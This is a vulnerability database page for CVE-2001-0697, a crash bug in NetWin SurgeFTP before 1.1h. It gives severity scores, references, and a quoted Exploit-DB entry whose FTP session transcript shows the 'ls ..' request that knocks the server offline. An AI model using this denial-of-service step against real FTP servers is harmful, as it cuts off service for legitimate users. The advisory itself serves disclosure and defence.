CVE-2001-0697 : Detail

CVE-2001-0697

6.2%V4
Network
2002-03-09
04h00 +00:00
2002-03-01
09h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

NetWin SurgeFTP prior to 1.1h allows a remote attacker to cause a denial of service (crash) via an 'ls ..' command.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20659

Publication date : 2001-02-28 23h00 +00:00
Author : the Strumpf Noir Society
EDB Verified : Yes

source: https://www.securityfocus.com/bid/2442/info SurgeFTP is a FTP Server distributed and maintained by Netwin. SurgeFTP is a configurable, easily maintained ftp server, functional on both the UNIX and Windows platforms. A problem with the SurgeFTP program could allow a denial of service to legitimate users. This is due to the handling of malformed requests made by a client. It is possible to cause the server to cease functioning by logging in, and requesting a list of first the root directory, then a list of the directory above the root directory. Upon receiving the request, the ftp server resets connections, and ceases operating. Therefore, it is possible for a malicious user to deny service to legitimate users by passing the predescribed request to the ftp server. # ftp localhost Connected to testbak 220 SurgeFTP testbak (Version 1.0b) User (testbak:(none)): anonymous 331 Password required for anonymous. Password: 230- Alias Real path Access 230- / /home read 230 User anonymous logged in. 200 Port command successful. 150 Opening ASCII mode data connection for file list. (/) 226 Transfer complete. ftp> ls .. 200 Port command successful. 550 Opening ASCII mode data connection for file list. (/..) -> ftp get:Connection reset by peer

Products Mentioned

Configuraton 0

Netwin>>Surgeftp >> Version To (including) 1.1h

References

http://www.securityfocus.com/archive/1/165816
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/2442
Tags : vdb-entry, x_refsource_BID